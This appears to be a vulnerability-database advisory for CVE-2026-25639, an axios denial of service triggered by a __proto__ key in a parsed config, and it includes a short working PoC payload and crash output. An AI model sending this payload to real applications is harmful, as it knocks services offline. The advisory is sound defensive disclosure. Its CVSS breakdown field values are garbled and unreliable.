What is CVE-2026-25639?

# Denial of Service via **proto** Key in mergeConfig ### Summary The `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service. ### Details The vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101: ```javascript utils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) { const merge = mergeMap[prop] || mergeDeepProperties; const configValue = merge(config1[prop], config2[prop], prop); (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue); }); ``` When `prop` is `'__proto__'`: 1. `JSON.parse('{"__proto__": {...}}')` creates an object with `__proto__` as an own enumerable property 2. `Object.keys()` includes `'__proto__'` in the iteration 3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object) 4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype` 5. `Object.prototype(...)` throws `TypeError: merge is not a function` The `mergeConfig` function is called by: - `Axios._request()` at `lib/core/Axios.js:75` - `Axios.getUri()` at `lib/core/Axios.js:201` - All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224` ### PoC ```javascript import axios from "axios"; const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}'); await axios.get("https://httpbin.org/get", maliciousConfig); ``` **Reproduction steps:** 1. Clone axios repository or `npm install axios` 2. Create file `poc.mjs` with the code above 3. Run: `node poc.mjs` 4. Observe the TypeError crash **Verified output (axios 1.13.4):** ``` TypeError: merge is not a function at computeConfigValue (lib/core/mergeConfig.js:100:25) at Object.forEach (lib/utils.js:280:10) at mergeConfig (lib/core/mergeConfig.js:98:9) ``` **Control tests performed:** | Test | Config | Result | |------|--------|--------| | Normal config | `{"timeout": 5000}` | SUCCESS | | Malicious config | `JSON.parse('{"__proto__": {"x": 1}}')` | **CRASH** | | Nested object | `{"headers": {"X-Test": "value"}}` | SUCCESS | **Attack scenario:** An application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{"__proto__": {"x": 1}}`. ### Impact **Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload. Affected environments: - Node.js servers using axios for HTTP requests - Any backend that passes parsed JSON to axios configuration This is NOT prototype pollution - the application crashes before any assignment occurs.

What is the severity of CVE-2026-25639?

CVE-2026-25639 has a CVSS v3 score of 7.5, which is classified as High severity.

Is there an exploit available for CVE-2026-25639?

No known public exploits are currently available for CVE-2026-25639.

Is there a patch available for CVE-2026-25639?

Yes, patches are available for CVE-2026-25639. Check the vendor advisories for update instructions.

Severity Scores

CVSS v37.5

CVSS v20.0

Priority Score386.0

EPSS Score0.0

High

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

7.5

CVSS

No

Exploit

Yes

Patch

Low Priority

no major risk factors

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Denial of Service via proto Key in mergeConfig

Summary

The mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.

Details

The vulnerability exists in lib/core/mergeConfig.js at lines 98-101:

utils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {
  const merge = mergeMap[prop] || mergeDeepProperties;
  const configValue = merge(config1[prop], config2[prop], prop);
  (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);
});

When prop is '__proto__':

JSON.parse('{"__proto__": {...}}') creates an object with __proto__ as an own enumerable property
Object.keys() includes '__proto__' in the iteration
mergeMap['__proto__'] performs prototype chain lookup, returning Object.prototype (truthy object)
The expression mergeMap[prop] || mergeDeepProperties evaluates to Object.prototype
Object.prototype(...) throws TypeError: merge is not a function

The mergeConfig function is called by:

Axios._request() at lib/core/Axios.js:75
Axios.getUri() at lib/core/Axios.js:201
All HTTP method shortcuts (get, post, etc.) at lib/core/Axios.js:211,224

PoC

import axios from "axios";

const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://httpbin.org/get", maliciousConfig);

CVSS v3 Breakdown

Attack Vector:Network

Attack Complexity:Local

Privileges Required:Network

User Interaction:Network

Scope:Unchanged

Confidentiality:Network

Integrity:Network

Availability:High

Patch References

Github.com Github.com Github.com

Ready for Agentic Automated Testing?

CVE-2026-25639

Denial of Service via proto Key in mergeConfig

Summary

Details

PoC

Impact